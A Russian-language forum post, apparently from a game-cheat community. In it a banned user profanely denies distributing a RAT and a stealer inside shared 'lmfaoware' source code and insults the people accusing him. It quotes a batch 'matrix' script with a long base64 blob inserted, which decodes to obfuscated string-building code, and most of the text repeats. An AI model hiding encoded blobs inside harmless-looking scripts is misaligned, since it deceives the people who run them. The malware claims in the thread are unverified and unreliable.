единичка
-
Автор темы
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
говорят что люди ратник и стиллеры получили? где ля? вы проверяли диспетчер задач хотябы или че то говорили и ваще, меня бы давно забанили за нарушение правил (ака кидая вирусы), мозгов нет чтобы подумать об этом?
+ следующий дебил elgato1337 (еще кто то слил ему сурс, жду бана кста этому человеку)
пишет типа про пирамиду, то что какой то ебучий экзарн (нахуй мне он сдался) - блять нахуй это я и кинул ратник и стиллер В СУРСЕ всем (хмм вт на сурсы, югейм? новое правило давайте)
+ у меня был на компе ратник, я думал он нормальный все elgato1337
спасибо ему конечно то что об этом он сказал, но блять...
дальше он говорит про файлы с нетварами, где я в base64 их скрыл, чтоб люди хацкеры нашли ебаные новые нетвары (не знаю че у меня было в голове), но нетвары то были.
потом присылает он текст этой команды смд:
что же рандом рандом может быть ммм..
ЭТО СУКА ЕБАНАЯ МАТРИЦА, тупо нахуй для прикола, она блять ниче не делает, echo делает текст а %random% добавляет в cmd такие циферки: 2342404802
тупо по рандому. блять рандому.
а теперь вопрос, почему я не в бане раз уж всем ратники и стиллеры кидал мм?
и еще вопрос, чекните хотя бы свои пк прежде чем пиздеть хуйню.
если надо полный разговор с аГЕЙветом, скину.
dav1dxzol
и я могу сейчас любому пользователю lmfaoware сказать проверить компы, а там ратника и стиллера и в помине нет.
а для тупых, если я блять ратник и стиллер кидал, нахуй мне об этом рассказывать, в чем логика?
+ следующий дебил elgato1337 (еще кто то слил ему сурс, жду бана кста этому человеку)
пишет типа про пирамиду, то что какой то ебучий экзарн (нахуй мне он сдался) - блять нахуй это я и кинул ратник и стиллер В СУРСЕ всем (хмм вт на сурсы, югейм? новое правило давайте)
+ у меня был на компе ратник, я думал он нормальный все elgato1337
спасибо ему конечно то что об этом он сказал, но блять...
дальше он говорит про файлы с нетварами, где я в base64 их скрыл, чтоб люди хацкеры нашли ебаные новые нетвары (не знаю че у меня было в голове), но нетвары то были.
потом присылает он текст этой команды смд:
@@Echo off
color 04
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
W5jcnlwdGVkTFZMMVsxMF0gPSAxMjIgLSAyOw0KIEVuY3J5cHRlZExWTDFbMThdID0gTCdsJyAtIDA7DQogRW5jcnlwdGVkTFZMMVsxXSA9IDEyMiAtIDEwOw0KIEVuY3J5cHRlZExWTDFbOF0gPSA0NjsNCiBFbmNyeXB0ZWRMVkwxWzJdID0gMTE3IC0gMTY7DQogRW5jcnlwdGVkTFZMMVswXSA9IEwnVicgKyAyNTsNCiBFbmNyeXB0ZWRMVkwxWzVdID0gTCc+JyArIDM3Ow0KIEVuY3J5cHRlZExWTDFbMjBdID0gTCd6JyAtIDA7DQogRW5jcnlwdGVkTFZMMVs5XSA9IDg3ICsgMTQ7DQogRW5jcnlwdGVkTFZMMVsxNF0gPSA2NiArIDMxOw0KIEVuY3J5cHRlZExWTDFbNF0gPSBMJyAnICsgMDsNCiBFbmNyeXB0ZWRMVkwxWzEyXSA9IEwnRicgLSA3MDsNCiBFbmNyeXB0ZWRMVkwxWzIzXSA9IEwndCcgLSA4Ow0KIEVuY3J5cHRlZExWTDFbMTFdID0gMTAxOw0KIEVuY3J5cHRlZExWTDFbMTddID0gTCdxJyAtIDQ7DQogRW5jcnlwdGVkTFZMMVs3XSA9IDk5ICsgMTsNCiBFbmNyeXB0ZWRMVkwxWzZdID0gTCdFJyArIDQwOw0KIEVuY3J5cHRlZExWTDFbMTVdID0gTCd1JyAtIDA7DQogRW5jcnlwdGVkTFZMMVsxOV0gPSAxMTU7DQogRW5jcnlwdGVkTFZMMVszXSA9IDU3ICsgNTM7DQogRW5jcnlwdGVkTFZMMVsxNl0gPSAxMTUgLSA5Ow0KIEVuY3J5cHRlZExWTDFbMTNdID0gTCdxJyAtIDE7DQogRW5jcnlwdGVkTFZMMVsyMV0gPSAxMTEgLSAxOw==
goto start
что же рандом рандом может быть ммм..
ЭТО СУКА ЕБАНАЯ МАТРИЦА, тупо нахуй для прикола, она блять ниче не делает, echo делает текст а %random% добавляет в cmd такие циферки: 2342404802
тупо по рандому. блять рандому.
а теперь вопрос, почему я не в бане раз уж всем ратники и стиллеры кидал мм?
и еще вопрос, чекните хотя бы свои пк прежде чем пиздеть хуйню.
если надо полный разговор с аГЕЙветом, скину.
dav1dxzol
и я могу сейчас любому пользователю lmfaoware сказать проверить компы, а там ратника и стиллера и в помине нет.
а для тупых, если я блять ратник и стиллер кидал, нахуй мне об этом рассказывать, в чем логика?